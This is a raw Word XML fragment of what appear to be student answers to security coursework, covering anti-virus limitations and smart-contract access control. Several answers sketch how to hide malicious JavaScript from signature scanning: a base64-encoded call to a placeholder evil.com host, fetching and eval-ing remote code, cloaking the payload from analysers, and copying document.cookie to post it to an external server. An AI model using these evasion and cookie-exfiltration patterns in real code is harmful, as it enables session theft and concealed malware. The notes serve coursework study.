        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Role “Food Delivery” with MAC 00:00:00:00:00:16 in table 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3F97B58D" w:rsidP="7EA872C9" w:rsidRDefault="3F97B58D" w14:paraId="47E72F23" w14:textId="3D97AE5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Role “Food Delivery”, Domain “Door”, Category “6,7” in table 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="69822F58" w14:textId="6A112973">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="40638351" w14:textId="44818988">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3F97B58D" w:rsidP="7EA872C9" w:rsidRDefault="3F97B58D" w14:paraId="6C889AD0" w14:textId="1A9E95EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0BB8119F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Iii) </w:t>
      </w:r>
      <w:r w:rsidRPr="0BB8119F" w:rsidR="0284CE5D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Add new column with acceptable time of day to Table 5? Then add labels for these times of day in a new table.</w:t>
      </w:r>
      <w:r w:rsidRPr="0BB8119F" w:rsidR="6E203B9B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0BB8119F" w:rsidR="0284CE5D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Then just need to add the time in the request</w:t>
      </w:r>
      <w:commentRangeStart w:id="8"/>
      <w:commentRangeEnd w:id="8"/>
      <w:r>
        <w:commentReference w:id="8"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="2650A1E2" w14:textId="2F288E3C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="17DD66A5" w:rsidP="7EA872C9" w:rsidRDefault="17DD66A5" w14:paraId="3BA8C9D3" w14:textId="1586128B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Q3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="396D9B96" w:rsidP="7EA872C9" w:rsidRDefault="396D9B96" w14:paraId="0FBDB166" w14:textId="055143DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A) The anti-virus vendor has to create and test the signature for each new malware. There’s always going to be a delay between finding out about a new virus and pushing a new signature to the anti-virus. Also viruses can mutate and just modify their signature making the anti-virus in</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="66E855C5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>effective.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="172C28E1" w14:textId="0BC9DE0C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="66E855C5" w:rsidP="7EA872C9" w:rsidRDefault="66E855C5" w14:paraId="016C1B8D" w14:textId="73036C83">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0BB8119F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidRPr="0BB8119F" w:rsidR="492CC112">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="0BB8119F" w:rsidR="10EE7245">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:r w:rsidRPr="0BB8119F" w:rsidR="22196100">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>- Integrity?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="1DABA82E" w14:textId="5712422E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="10EE7245" w:rsidP="7EA872C9" w:rsidRDefault="10EE7245" w14:paraId="2108BD45" w14:textId="726CB87F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="17DD66A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="483FE737">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The AV software is given full access to your file system. It can upload sensitive information to the vendor </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="33684A66" w14:textId="19719BD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="483FE737" w:rsidP="7EA872C9" w:rsidRDefault="483FE737" w14:paraId="7B6738BE" w14:textId="4DF71100">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">D) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="74D3E87C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Polymorphic worms are standalone and can self-propagate. They constantly change to evade detection but keep their functionality. A DOS can be carried out by unbounded replication?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="272FD308" w:rsidP="7EA872C9" w:rsidRDefault="272FD308" w14:paraId="339DF727" w14:textId="13F3854B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">E) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="477D4E98">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Avoid security by obscurity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0AB6D88A" w:rsidP="7EA872C9" w:rsidRDefault="0AB6D88A" w14:paraId="49A8C18C" w14:textId="6553788E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">F) Likely not very effective. Javascript is usually minfied/obfuscated </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="15FE9F4A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">when received from the web server </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>so signatures won’t match</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="47956FB8" w:rsidP="7EA872C9" w:rsidRDefault="47956FB8" w14:paraId="571312F8" w14:textId="17DFCF8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">G) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="363149C7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Maybe some base64 encoding? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="363149C7" w:rsidP="7EA872C9" w:rsidRDefault="363149C7" w14:paraId="21B036D9" w14:textId="33AD38EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="368B5350">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Fetch (</w:t>
      </w:r>
      <w:r w:rsidRPr="368B5350">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>atob(‘aHR0cDovL2V2aWwuY29t’)</w:t>
      </w:r>
      <w:r w:rsidRPr="368B5350" w:rsidR="0FA1581E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">  //just base64 encoded url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="73BD104A" w:rsidP="368B5350" w:rsidRDefault="17B5A7C5" w14:paraId="170DD67B" w14:textId="2335A13E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-Maybe recreate URL = ‘hhtp’ + [str for str in [‘e’, ‘v’, ‘i’,’l’]] + ‘.com’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="3AA2F454" w14:textId="57B01C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="22D5625B" w14:paraId="310D37CF" w14:textId="5A64BBEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="73608C31">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">H) </w:t>
      </w:r>
      <w:r w:rsidRPr="73608C31" w:rsidR="3B128E93">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Pull the evil code in from an external server: code = fetch(...), eval(code). Avoid analysis by e.g. not serving the payload to what doesn’t appear to be a valid web browser</w:t>
      </w:r>
      <w:r w:rsidRPr="73608C31" w:rsidR="418B6028">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="73608C31" w:rsidR="3B128E93">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r w:rsidRPr="73608C31" w:rsidR="0B1AA783">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>analysis is being run.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35763E0C" w:rsidP="040D8293" w:rsidRDefault="35763E0C" w14:paraId="2C7DC182" w14:textId="3ED549B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Encrypt the code, then decrypt before eval. Avoids references to document.cookie being detected maybe. If it’s just static analysis then as long as we don’t have an actual code reference to document.cookie are we ok?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="74EBD9FC" w:rsidP="5C876294" w:rsidRDefault="74EBD9FC" w14:paraId="115262AF" w14:textId="73A0BF71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C876294">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Or could we use JSON.parse(JSON.stringify(document.cookie)) to create a clone of cookies and post this variable to the external source (without refere</w:t>
      </w:r>
      <w:r w:rsidRPr="5C876294" w:rsidR="03DCD126">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>nce to cookie directly</w:t>
      </w:r>
      <w:r w:rsidRPr="5C876294">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20DDD2C1" w:rsidP="20DDD2C1" w:rsidRDefault="20DDD2C1" w14:paraId="13322BFB" w14:textId="55914AC9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="083C6324" w:rsidP="7EA872C9" w:rsidRDefault="083C6324" w14:paraId="182ECCC5" w14:textId="3A36FC69">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">I) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="7D13726D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>AVs can do some basic in memory scanning but can’t work to the same extent as it is an expensive operation. Usually signature-based scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="0EF5AB44" w14:textId="4D634233">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D13726D" w:rsidP="7EA872C9" w:rsidRDefault="7D13726D" w14:paraId="1CCBCAE1" w14:textId="5F867B1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Q4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CE98F72" w:rsidP="7EA872C9" w:rsidRDefault="1CE98F72" w14:paraId="6EBBAEC5" w14:textId="1FFE27A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A) If a malicious actor removed legitimate entries you get false negatives and if they add entries which shouldn’t be there you get false positives.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CE98F72" w:rsidP="7EA872C9" w:rsidRDefault="1CE98F72" w14:paraId="446F14EA" w14:textId="27AE510E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0454CF1E" w:rsidP="7EA872C9" w:rsidRDefault="0454CF1E" w14:paraId="2F0D064C" w14:textId="49DA577B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">+Requires consensus to add new data. So one person can’t just add whatever they want. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0454CF1E" w:rsidP="7EA872C9" w:rsidRDefault="0454CF1E" w14:paraId="7A91217A" w14:textId="3A9B2989">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>+Cannot overwrite existing entries</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0454CF1E" w:rsidP="7EA872C9" w:rsidRDefault="0454CF1E" w14:paraId="385EA8CA" w14:textId="1D107BEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-Complex verification process. Not as simple as just adding to the list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0454CF1E" w:rsidP="7EA872C9" w:rsidRDefault="0454CF1E" w14:paraId="14644BB4" w14:textId="42FEA5A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-Lots of redundancy in updates so requires a lot m</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="3FBF4C90">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ore computational power</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="12A7E937" w14:textId="37384454">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3FBF4C90" w:rsidP="7EA872C9" w:rsidRDefault="3FBF4C90" w14:paraId="7F2E406C" w14:textId="0570A7F3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="214C88BC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidRPr="214C88BC" w:rsidR="09236587">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Only the contract will allow itself to update the list. List may be requested to be updated by the contract, then approve this with majority vote? Or </w:t>
      </w:r>
      <w:r w:rsidRPr="214C88BC" w:rsidR="7C007B83">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">maybe </w:t>
      </w:r>
      <w:r w:rsidRPr="214C88BC" w:rsidR="09236587">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>allow pre-defined authorised people to update the list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="3EDE62CD" w14:textId="1A185B28">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6A2486B2" w:rsidP="1C791799" w:rsidRDefault="6A2486B2" w14:paraId="58074557" w14:textId="07CFB4B2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1C791799">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">D) </w:t>
      </w:r>
      <w:r w:rsidRPr="1C791799" w:rsidR="5733C4AB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>addItem, removeItem should require(msg.sender == owner)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5733C4AB" w:rsidP="1C791799" w:rsidRDefault="20191717" w14:paraId="0644BE23" w14:textId="5B62A111">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Private modifier only means that inherited contracts can’t access the field – anyone can still read the value of password stored I think -&gt; don’t store pw and use t</w:t>
      </w:r>
      <w:r w:rsidRPr="5DAC0D75" w:rsidR="697F7584">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>his</w:t>
      </w:r>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>, instead use owner = msg.sender in constructor</w:t>
      </w:r>
      <w:r w:rsidRPr="5DAC0D75" w:rsidR="77EC86DB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and require(msg.sender == owner) in changeOwner.</w:t>
      </w:r>
    </w:p>
